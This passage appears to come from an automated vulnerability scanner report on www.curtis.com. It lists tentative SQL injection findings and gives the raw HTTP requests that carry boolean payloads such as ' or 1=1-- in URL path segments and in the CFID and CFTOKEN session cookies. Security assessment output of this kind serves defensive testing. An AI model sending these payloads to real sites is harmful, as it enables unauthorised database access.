Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=6175843; CFTOKEN=32575697; __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.2.10.1303145803

Response 2 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:02:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">

<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link href="/sifr3/sifr3.css" rel="stylesheet" type="text/css" />

<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>

<!--::staticcontent::-->

<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearch"].keyword.focus();
       return false;
       }
   }
function checkSearchFormAttorney(){
    if((document.forms["attorneysearch"].firstlastname.value.length == 0)||(document.forms["attorneysearch"].firstlastname.value == "Enter Attorney Name")){
       alert('Please enter an attorneys first or last name for your search.');
       document.forms["attorneysearch"].firstlastname.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,td,th {
   font-size: 8pt;
}
body {
   background-color: #FFF;
   margin-left: 0px;
   margin-top: 10px;
   margin-right: 0px;
   margin-bottom: 10px;
}
--
...[SNIP]...

1.28. http://www.curtis.com/sifr3/adobegaramond.swf [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.curtis.com
Path:   /sifr3/adobegaramond.swf

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads 11428496'%20or%201%3d1--%20 and 11428496'%20or%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /sifr3/adobegaramond.swf11428496'%20or%201%3d1--%20 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/sitecontent.cfm?pageid=6
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=6175843; CFTOKEN=32575697; __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.2.10.1303145803

Response 1 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:02:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<link rel="stylesheet" href="scripts/general.css" type="text/css" media="all" />
<link rel="stylesheet" href="scripts/menu.css" type="text/css" media="all" />
<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css"/>
<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />
<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>
<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>
<script src="scripts/AC_RunActiveContent.js" type="text/javascript"></script>
<script language="javascript" type="text/javascript" src="scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="scripts/jquery.dimensions.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/carousel/carousel_behavior_min.js"></script>
<script language="javascript" type="text/javascript" src="scripts/nyroModal/nyroModal.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<link rel="stylesheet" href="scripts/carousel/carousel.css" type="text/css">


<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearch"].keyword.focus();
       return false;
       }
   }
function checkSearchFormAttorney(){
    if((document.forms["attorneysearch"].firstlastname.value.length == 0)||(document.forms["attorneysearch"].firstlastname.value == "Enter Attorney Name")){
       alert('Please enter an attorneys first or last name for your search.');
       document.forms["attorneysearc
...[SNIP]...

Request 2

GET /sifr3/adobegaramond.swf11428496'%20or%201%3d2--%20 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/sitecontent.cfm?pageid=6
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=6175843; CFTOKEN=32575697; __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.2.10.1303145803

Response 2 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:02:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">

<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link href="/sifr3/sifr3.css" rel="stylesheet" type="text/css" />

<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>

<!--::staticcontent::-->

<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearch"].keyword.focus();
       return false;
       }
   }
function checkSearchFormAttorney(){
    if((document.forms["attorneysearch"].firstlastname.value.length == 0)||(document.forms["attorneysearch"].firstlastname.value == "Enter Attorney Name")){
       alert('Please enter an attorneys first or last name for your search.');
       document.forms["attorneysearch"].firstlastname.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,td,th {
   font-size: 8pt;
}
body {
   background-color: #FFF;
   margin-left: 0px;
   margin-top: 10px;
   margin-right: 0px;
   margin-bottom: 10px;
}
--
...[SNIP]...

1.29. http://www.curtis.com/sifr3/gillsans.swf [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.curtis.com
Path:   /sifr3/gillsans.swf

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 13597788'%20or%201%3d1--%20 and 13597788'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /sifr313597788'%20or%201%3d1--%20/gillsans.swf HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/sitecontent.cfm?pageid=6
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=6175843; CFTOKEN=32575697; __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.2.10.1303145803

Response 1 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:02:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<link rel="stylesheet" href="scripts/general.css" type="text/css" media="all" />
<link rel="stylesheet" href="scripts/menu.css" type="text/css" media="all" />
<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css"/>
<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />
<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>
<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>
<script src="scripts/AC_RunActiveContent.js" type="text/javascript"></script>
<script language="javascript" type="text/javascript" src="scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="scripts/jquery.dimensions.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/carousel/carousel_behavior_min.js"></script>
<script language="javascript" type="text/javascript" src="scripts/nyroModal/nyroModal.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<link rel="stylesheet" href="scripts/carousel/carousel.css" type="text/css">


<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearch"].keyword.focus();
       return false;
       }
   }
function checkSearchFormAttorney(){
    if((document.forms["attorneysearch"].firstlastname.value.length == 0)||(document.forms["attorneysearch"].firstlastname.value == "Enter Attorney Name")){
       alert('Please enter an attorneys first or last name for your search.');
       document.forms["attorneysearc
...[SNIP]...

Request 2

GET /sifr313597788'%20or%201%3d2--%20/gillsans.swf HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/sitecontent.cfm?pageid=6
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=6175843; CFTOKEN=32575697; __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.2.10.1303145803

Response 2 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:02:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">

<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link href="/sifr3/sifr3.css" rel="stylesheet" type="text/css" />

<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>

<!--::staticcontent::-->

<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearch"].keyword.focus();
       return false;
       }
   }
function checkSearchFormAttorney(){
    if((document.forms["attorneysearch"].firstlastname.value.length == 0)||(document.forms["attorneysearch"].firstlastname.value == "Enter Attorney Name")){
       alert('Please enter an attorneys first or last name for your search.');
       document.forms["attorneysearch"].firstlastname.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,td,th {
   font-size: 8pt;
}
body {
   background-color: #FFF;
   margin-left: 0px;
   margin-top: 10px;
   margin-right: 0px;
   margin-bottom: 10px;
}
--
...[SNIP]...

1.30. http://www.curtis.com/sifr3/gillsans.swf [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.curtis.com
Path:   /sifr3/gillsans.swf

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads 14043355'%20or%201%3d1--%20 and 14043355'%20or%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /sifr3/gillsans.swf14043355'%20or%201%3d1--%20 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/sitecontent.cfm?pageid=6
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=6175843; CFTOKEN=32575697; __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.2.10.1303145803

Response 1 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:02:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<link rel="stylesheet" href="scripts/general.css" type="text/css" media="all" />
<link rel="stylesheet" href="scripts/menu.css" type="text/css" media="all" />
<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css"/>
<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />
<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>
<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>
<script src="scripts/AC_RunActiveContent.js" type="text/javascript"></script>
<script language="javascript" type="text/javascript" src="scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="scripts/jquery.dimensions.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/carousel/carousel_behavior_min.js"></script>
<script language="javascript" type="text/javascript" src="scripts/nyroModal/nyroModal.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<link rel="stylesheet" href="scripts/carousel/carousel.css" type="text/css">


<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearch"].keyword.focus();
       return false;
       }
   }
function checkSearchFormAttorney(){
    if((document.forms["attorneysearch"].firstlastname.value.length == 0)||(document.forms["attorneysearch"].firstlastname.value == "Enter Attorney Name")){
       alert('Please enter an attorneys first or last name for your search.');
       document.forms["attorneysearc
...[SNIP]...

Request 2

GET /sifr3/gillsans.swf14043355'%20or%201%3d2--%20 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/sitecontent.cfm?pageid=6
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=6175843; CFTOKEN=32575697; __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.2.10.1303145803

Response 2 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:02:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">

<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link href="/sifr3/sifr3.css" rel="stylesheet" type="text/css" />

<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>

<!--::staticcontent::-->

<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearch"].keyword.focus();
       return false;
       }
   }
function checkSearchFormAttorney(){
    if((document.forms["attorneysearch"].firstlastname.value.length == 0)||(document.forms["attorneysearch"].firstlastname.value == "Enter Attorney Name")){
       alert('Please enter an attorneys first or last name for your search.');
       document.forms["attorneysearch"].firstlastname.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,td,th {
   font-size: 8pt;
}
body {
   background-color: #FFF;
   margin-left: 0px;
   margin-top: 10px;
   margin-right: 0px;
   margin-bottom: 10px;
}
--
...[SNIP]...

1.31. http://www.curtis.com/sitecontent.cfm [CFID cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.curtis.com
Path:   /sitecontent.cfm

Issue detail

The CFID cookie appears to be vulnerable to SQL injection attacks. The payloads 18432304%20or%201%3d1--%20 and 18432304%20or%201%3d2--%20 were each submitted in the CFID cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /sitecontent.cfm?pageid=11 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/sitecontent.cfm?pageid=11
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=617584318432304%20or%201%3d1--%20; CFTOKEN=32575697; __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.3.10.1303145803

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Mon, 18 Apr 2011 17:01:03 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=;expires=Sun, 18-Apr-2010 17:01:03 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /sitecontent.cfm?pageid=11 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/sitecontent.cfm?pageid=11
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=617584318432304%20or%201%3d2--%20; CFTOKEN=32575697; __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.3.10.1303145803

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:01:03 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175952;path=/
Set-Cookie: CFTOKEN=14488976;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">

<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link href="/sifr3/sifr3.css" rel="stylesheet" type="text/css" />

<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>

<!--::offices::-->

<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearch"].keyword.focus();
       return false;
       }
   }
function checkSearchFormAttorney(){
    if((document.forms["attorneysearch"].firstlastname.value.l
...[SNIP]...

1.32. http://www.curtis.com/sitecontent.cfm [CFTOKEN cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.curtis.com
Path:   /sitecontent.cfm

Issue detail

The CFTOKEN cookie appears to be vulnerable to SQL injection attacks. The payloads 90677941%20or%201%3d1--%20 and 90677941%20or%201%3d2--%20 were each submitted in the CFTOKEN cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /sitecontent.cfm?pageid=11 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/sitecontent.cfm?pageid=11
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=6175843; CFTOKEN=3257569790677941%20or%201%3d1--%20; __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.3.10.1303145803

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Mon, 18 Apr 2011 17:01:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFTOKEN=;expires=Sun, 18-Apr-2010 17:01:13 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /sitecontent.cfm?pageid=11 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/sitecontent.cfm?pageid=11
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
